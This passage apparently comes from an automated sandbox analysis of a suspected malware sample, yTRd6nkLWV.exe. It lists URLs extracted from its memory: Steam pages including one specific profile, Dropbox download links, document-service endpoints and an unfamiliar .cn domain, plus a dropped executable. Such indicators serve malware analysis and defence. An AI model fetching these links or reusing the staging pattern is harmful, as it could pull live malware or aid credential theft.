              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stic
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJEl
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=iUcMsAN_acD6&l=e
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&am
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsi
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsiv
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1597973358.000000000067D000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1598954427.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dropbox.com/n
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://forums.dropbox.com
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.c
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://status.dropbox.com
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamai
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457509468.000000000067A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.0000000000675000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: yTRd6nkLWV.exeString found in binary or memory: https://store.steampowe
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1597973358.000000000069D000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599349700.0000000000694000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000693000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599349700.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com/cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
              Source: yTRd6nkLWV.exeString found in binary or memory: https://www.certum.pl/CPS0
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://www.dropbox.com/help
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://www.dropbox.com/home
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfj
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
